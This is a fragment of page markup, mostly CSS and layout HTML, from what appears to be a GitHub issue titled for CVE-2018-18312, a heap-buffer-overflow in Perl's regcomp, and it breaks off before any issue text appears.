.crMLA-D{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;gap:8px;}/*!sc*/ .bjwYme{border:1px solid;border-color:var(--borderColor-default,var(--color-border-default,#d0d7de));border-radius:6px;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;width:100%;min-width:0;}/*!sc*/ .jSpDiO{background-color:var(--bgColor-muted,var(--color-canvas-subtle,#f6f8fa));border-top-left-radius:6px;border-top-right-radius:6px;border-bottom:1px solid;border-bottom-color:var(--borderColor-muted,var(--color-border-muted,hsla(210,18%,87%,1)));color:var(--fgColor-muted,var(--color-fg-muted,#656d76));display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-flex:1;-ms-flex:1;flex:1;font-size:14px;padding-top:4px;padding-bottom:4px;padding-right:4px;padding-left:16px;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;overflow:hidden;}/*!sc*/ .fnEhwD{width:100%;min-width:0;min-height:var(--control-small-size,28px);-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-align-items:stretch;-webkit-box-align:stretch;-ms-flex-align:stretch;align-items:stretch;padding-bottom:0;}/*!sc*/ .iKiGfw{place-self:center;grid-area:avatar;margin-right:8px;}/*!sc*/ .koxHLL{min-width:0;grid-column-start:title;grid-column-end:badges;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-flex-shrink:1;-ms-flex-negative:1;flex-shrink:1;-webkit-flex-basis:auto;-ms-flex-preferred-size:auto;flex-basis:auto;-webkit-column-gap:0.45ch;column-gap:0.45ch;padding-top:4px;padding-bottom:4px;}/*!sc*/ .dqmClk{grid-area:title;margin-top:0;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-shrink:1;-ms-flex-negative:1;flex-shrink:1;-webkit-flex-basis:auto;-ms-flex-preferred-size:auto;flex-basis:auto;overflow:hidden;}/*!sc*/ .cRhwji{color:var(--fgColor-default,var(--color-fg-default,#1F2328));font-weight:500;grid-area:login;-webkit-flex-shrink:1;-ms-flex-negative:1;flex-shrink:1;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;-webkit-align-self:flex-end;-ms-flex-item-align:end;align-self:flex-end;}/*!sc*/ .bJQcYY{grid-area:footer;line-height:1.4;}/*!sc*/ .bjFvWy{color:var(--fgColor-muted,var(--color-fg-muted,#656d76));}/*!sc*/ .kgTqOk{white-space:nowrap;grid-area:actions;-webkit-column-gap:var(--base-size-4,4px);column-gap:var(--base-size-4,4px);-webkit-box-pack:end;-webkit-justify-content:flex-end;-ms-flex-pack:end;justify-content:flex-end;-webkit-flex-shrink:2;-ms-flex-negative:2;flex-shrink:2;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;-webkit-align-items:flex-start;-webkit-box-align:flex-start;-ms-flex-align:flex-start;align-items:flex-start;}/*!sc*/ .izrTon{grid-area:edits;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:end;-webkit-justify-content:flex-end;-ms-flex-pack:end;justify-content:flex-end;overflow:hidden;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;-webkit-align-items:flex-start;-webkit-box-align:flex-start;-ms-flex-align:flex-start;align-items:flex-start;margin-left:8px;}/*!sc*/ @media screen and (min-width:544px){.izrTon{-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;}}/*!sc*/ @media screen and (min-width:768px){.izrTon{-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;}}/*!sc*/ @media screen and (min-width:1012px){.izrTon{-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;}}/*!sc*/ .kpoUe{grid-column-start:badges;grid-column-end:actions;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-column-gap:var(--base-size-4,4px);column-gap:var(--base-size-4,4px);-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:end;-webkit-justify-content:flex-end;-ms-flex-pack:end;justify-content:flex-end;}/*!sc*/ .ezcJRX{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:end;-webkit-justify-content:flex-end;-ms-flex-pack:end;justify-content:flex-end;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-column-gap:var(--base-size-8,8px);column-gap:var(--base-size-8,8px);margin-left:4px;}/*!sc*/ .dnyPuu{grid-area:actions;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-column-gap:var(--base-size-4,4px);column-gap:var(--base-size-4,4px);}/*!sc*/ .fDhSWy{margin-bottom:16px;}/*!sc*/ .kpqASb{width:auto;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;}/*!sc*/ @media screen and (min-width:544px){.kpqASb{width:auto;}}/*!sc*/ @media screen and (min-width:768px){.kpqASb{width:256px;}}/*!sc*/ @media screen and (min-width:1012px){.kpqASb{width:296px;}}/*!sc*/ .kDreLw{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-align-items:flex-start;-webkit-box-align:flex-start;-ms-flex-align:flex-start;align-items:flex-start;padding-top:4px;margin-bottom:16px;position:relative;width:100%;}/*!sc*/ .kDreLw:after{content:"";position:absolute;height:1px;bottom:-8px;left:8px;background-color:var(--borderColor-muted,var(--color-border-muted,hsla(210,18%,87%,1)));width:calc(100% - 8px);}/*!sc*/ .bwxuvd{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;width:100%;padding-bottom:8px;}/*!sc*/ .jVkRst{top:4px;left:8px;font-size:12px;color:var(--fgColor-muted,var(--color-fg-muted,#656d76));position:relative;pointer-events:none;}/*!sc*/ .dCKzSy{font-size:12px;padding-left:8px;padding-right:8px;margin-bottom:8px;margin-top:4px;color:var(--fgColor-muted,var(--color-fg-muted,#656d76));display:block;}/*!sc*/ .flpEwB{height:0px;padding:0;margin:0;border:0;visibility:hidden;}/*!sc*/ .foDGRB{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-shrink:1;-ms-flex-negative:1;flex-shrink:1;gap:4px;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap;overflow:hidden;height:100%;-webkit-box-pack:start;-webkit-justify-content:flex-start;-ms-flex-pack:start;justify-content:flex-start;padding-left:8px;padding-right:8px;padding-top:4px;padding-bottom:8px;font-size:12px;}/*!sc*/ .gMMrYE{margin-left:8px;margin-top:4px;}/*!sc*/ .fBPJxs{padding-left:8px;padding-right:4px;width:100%;}/*!sc*/ .jZGZCQ{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;gap:16px;}/*!sc*/ .kqdiwS{height:40px;width:40px;margin-top:24px;}/*!sc*/ .bcnvkr{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;}/*!sc*/ .fwWvvw{padding-left:24px;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;}/*!sc*/ .kRydKY{padding-bottom:16px;margin-left:4px;width:2px;background-color:var(--borderColor-muted,var(--color-border-muted,hsla(210,18%,87%,1)));}/*!sc*/ .fMCkUS{padding-bottom:16px;margin-right:4px;width:2px;}/*!sc*/ .jTVDGA{border:1px solid;border-color:var(--bgColor-neutral-muted,var(--color-neutral-muted,rgba(175,184,193,0.2)));border-radius:6px;background-color:var(--bgColor-default,var(--color-canvas-default,#ffffff));box-shadow:var(--shadow-resting-small,var(--color-shadow-small,0 1px 0 rgba(31,35,40,0.04)));overflow-x:auto;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;padding:16px;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;gap:16px;}/*!sc*/ .ioNKhs{-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;}/*!sc*/ .jKxfJf{height:sm;width:150px;}/*!sc*/ .ieSmsH{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;gap:8px;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;}/*!sc*/ .hpcToU{height:sm;width:random;}/*!sc*/ data-styled.g1[id="Box-sc-g0xbh4-0"]{content:"gjuRkX,hzqxma,fGkgDM,ehzXEi,cEqqlB,dZmqGw,lhNOUb,YJa-Di,ialRZd,cQpCwc,lkyTpy,bKeiGd,eshSer,cySYaL,exQbKw,emuTBT,iEncmA,fHWHoy,htJDeH,hVVawZ,iQfnYL,jGasrR,gxAvdY,dkqtNN,hfKjHv,jonlJW,bSTcOH,gRssIw,bDlPR,crMLA-D,bjwYme,jSpDiO,fnEhwD,iKiGfw,koxHLL,dqmClk,cRhwji,bJQcYY,bjFvWy,kgTqOk,izrTon,kpoUe,ezcJRX,dnyPuu,fDhSWy,kpqASb,kDreLw,bwxuvd,jVkRst,dCKzSy,flpEwB,foDGRB,gMMrYE,fBPJxs,jZGZCQ,kqdiwS,bcnvkr,fwWvvw,kRydKY,fMCkUS,jTVDGA,ioNKhs,jKxfJf,ieSmsH,hpcToU,"}/*!sc*/ .eoXvfR{margin:0;padding-inline-start:0;padding-top:0;padding-bottom:0;}/*!sc*/ data-styled.g17[id="List__ListBox-sc-1x7olzq-0"]{content:"eoXvfR,"}/*!sc*/ .hTWZgt{margin-right:4px;}/*!sc*/ data-styled.g59[id="Octicon-sc-9kayk9-0"]{content:"hTWZgt,"}/*!sc*/ .qthD{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:50%;display:block;height:1.2em;border-radius:50%;width:40px;height:40px;margin-top:24px;}/*!sc*/ .qthD::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .eyUUZI{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:150px;height:16px;}/*!sc*/ .eyUUZI::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .jjSEMS{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:47%;height:16px;}/*!sc*/ .jjSEMS::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .itUJci{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:70%;height:16px;}/*!sc*/ .itUJci::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .cShPCj{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:79%;height:16px;}/*!sc*/ .cShPCj::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .duUilQ{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:76%;height:16px;}/*!sc*/ .duUilQ::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .izpEpw{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:63%;height:16px;}/*!sc*/ .izpEpw::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .jmMBqY{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:50%;height:16px;}/*!sc*/ .jmMBqY::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .izxDlu{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:52%;height:16px;}/*!sc*/ .izxDlu::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .kxHHCJ{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:40%;height:16px;}/*!sc*/ .kxHHCJ::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .kzTRZv{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:42%;height:16px;}/*!sc*/ .kzTRZv::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .cGKgXT{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:71%;height:16px;}/*!sc*/ .cGKgXT::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .jhGuqg{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:45%;height:16px;}/*!sc*/ .jhGuqg::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .iXfpGx{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:77%;height:16px;}/*!sc*/ .iXfpGx::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .likIaf{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:64%;height:16px;}/*!sc*/ .likIaf::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .iFsrGy{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:78%;height:16px;}/*!sc*/ .iFsrGy::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ .jiLAah{position:relative;overflow:hidden;-webkit-mask-image:radial-gradient(white,black);mask-image:radial-gradient(white,black);background-color:var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5)));border-radius:3px;display:block;height:1.2em;width:66%;height:16px;}/*!sc*/ .jiLAah::after{-webkit-animation:crVFvv 1.5s infinite linear;animation:crVFvv 1.5s infinite linear;background:linear-gradient(90deg,transparent,var(--bgColor-neutral-muted,var(--color-neutral-subtle,rgba(234,238,242,0.5))),transparent);content:'';position:absolute;-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);bottom:0;left:0;right:0;top:0;}/*!sc*/ data-styled.g65[id="LoadingSkeleton-sc-695d630a-0"]{content:"qthD,eyUUZI,jjSEMS,itUJci,cShPCj,duUilQ,izpEpw,jmMBqY,izxDlu,kxHHCJ,kzTRZv,cGKgXT,jhGuqg,iXfpGx,likIaf,iFsrGy,jiLAah,"}/*!sc*/ .gcWyXp{font-size:inherit;}/*!sc*/ data-styled.g66[id="sc-aXZVg"]{content:"gcWyXp,"}/*!sc*/ .jawglP{display:-webkit-inline-box;display:-webkit-inline-flex;display:-ms-inline-flexbox;display:inline-flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;font-weight:600;line-height:16px;color:var(--bgColor-default,var(--color-canvas-default,#ffffff));text-align:center;border-radius:100px;background-color:var(--bgColor-done-emphasis,var(--color-done-emphasis,#8250df));color:var(--fgColor-onEmphasis,var(--color-fg-on-emphasis,#ffffff));box-shadow:var(--boxShadow-thin,inset 0 0 0 1px) var(--borderColor-done-emphasis,transparent);padding-left:12px;padding-right:12px;padding-top:8px;padding-bottom:8px;font-size:14px;white-space:nowrap;}/*!sc*/ data-styled.g114[id="StateLabel__StateLabelBase-sc-qthdln-0"]{content:"jawglP,"}/*!sc*/ @-webkit-keyframes crVFvv{0%{-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);}50%{-webkit-transform:translateX(100%);-ms-transform:translateX(100%);transform:translateX(100%);}100%{-webkit-transform:translateX(100%);-ms-transform:translateX(100%);transform:translateX(100%);}}/*!sc*/ @keyframes crVFvv{0%{-webkit-transform:translateX(-100%);-ms-transform:translateX(-100%);transform:translateX(-100%);}50%{-webkit-transform:translateX(100%);-ms-transform:translateX(100%);transform:translateX(100%);}100%{-webkit-transform:translateX(100%);-ms-transform:translateX(100%);transform:translateX(100%);}}/*!sc*/ data-styled.g119[id="sc-keyframes-crVFvv"]{content:"crVFvv,"}/*!sc*/ </style><!--$--><!--$--><div class="Box-sc-g0xbh4-0 gjuRkX"><div data-testid="issue-viewer-container" class="Box-sc-g0xbh4-0 hzqxma"><!--$--><div class="Box-sc-g0xbh4-0 fGkgDM IssueViewer-module__issueViewerContainer--flht4"><!--$--><div class="Box-sc-g0xbh4-0 ehzXEi"><div aria-label="Header" role="region" data-testid="issue-header"><div class="Box-sc-g0xbh4-0 prc-PageHeader-PageHeader-sT1Hp HeaderViewer-module__headerContainer--p0Eo1 "><div class="Box-sc-g0xbh4-0 cEqqlB prc-PageHeader-TitleArea-jxJZy" data-component="TitleArea" data-size-variant="medium"><h1 class="Box-sc-g0xbh4-0 dZmqGw prc-PageHeader-Title-LKOsd prc-Heading-Heading-6CmGO" data-component="PH_Title" data-hidden="false" style="--custom-font-size:26px,26px,var(--text-title-size-large, 32px),var(--text-title-size-large, 32px);--custom-line-height:1;--custom-font-weight:normal"><bdi class="Box-sc-g0xbh4-0 lhNOUb markdown-title" data-testid="issue-title">[CVE-2018-18312] regcomp: heap-buffer-overflow write / reg_node overrun (perl-5.28.0, 5.26.2)</bdi> <span class="Box-sc-g0xbh4-0 YJa-Di">#16649</span></h1></div><div class="Box-sc-g0xbh4-0 prc-PageHeader-ContextArea-6ykSJ" data-hidden-regular="true"><div class="Box-sc-g0xbh4-0 ialRZd prc-PageHeader-ContextAreaActions-RTJRk" data-hidden-regular="true"><div class="Box-sc-g0xbh4-0 cQpCwc"><div class="Box-sc-g0xbh4-0 lkyTpy"><a type="button" href="/login?return_to=" target="_blank" class="prc-Button-ButtonBase-c50BI" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="primary" aria-describedby=":R4ih9b:-loading-announcement"><span data-component="buttonContent" data-align="center" class="prc-Button-ButtonContent-HKbr-"><span data-component="text" class="prc-Button-Label-pTQ3x">New issue</span></span></a></div><button data-component="IconButton" type="button" class="prc-Button-ButtonBase-c50BI prc-Button-IconButton-szpyj" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="invisible" aria-describedby=":Reqh9b:-loading-announcement" aria-labelledby=":Rqh9b:"><svg aria-hidden="true" focusable="false" class="octicon octicon-copy" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg></button><span class="CopyToClipboardButton-module__tooltip--Dq1IB prc-TooltipV2-Tooltip-cYMVY" data-direction="s" aria-label="Copy link" aria-hidden="true" id=":Rqh9b:">Copy link</span></div></div></div><div class="Box-sc-g0xbh4-0 bKeiGd prc-PageHeader-Actions-ygtmj" data-component="PH_Actions"><div class="Box-sc-g0xbh4-0 cQpCwc"><div class="Box-sc-g0xbh4-0 lkyTpy"><a type="button" href="/login?return_to=" target="_blank" class="prc-Button-ButtonBase-c50BI" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="primary" aria-describedby=":R4kh9b:-loading-announcement"><span data-component="buttonContent" data-align="center" class="prc-Button-ButtonContent-HKbr-"><span data-component="text" class="prc-Button-Label-pTQ3x">New issue</span></span></a></div><button data-component="IconButton" type="button" class="prc-Button-ButtonBase-c50BI prc-Button-IconButton-szpyj" data-loading="false" data-no-visuals="true" data-size="medium" data-variant="invisible" aria-describedby=":Resh9b:-loading-announcement" aria-labelledby=":Rsh9b:"><svg aria-hidden="true" focusable="false" class="octicon octicon-copy" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg></button><span class="CopyToClipboardButton-module__tooltip--Dq1IB prc-TooltipV2-Tooltip-cYMVY" data-direction="s" aria-label="Copy link" aria-hidden="true" id=":Rsh9b:">Copy link</span></div></div></div></div></div><div class="Box-sc-g0xbh4-0 ehzXEi"><div data-testid="issue-metadata-fixed" class="Box-sc-g0xbh4-0 eshSer"><div class="Box-sc-g0xbh4-0 cySYaL"><div class="Box-sc-g0xbh4-0 exQbKw"><div><span data-testid="header-state" class="StateLabel__StateLabelBase-sc-qthdln-0 jawglP"><svg 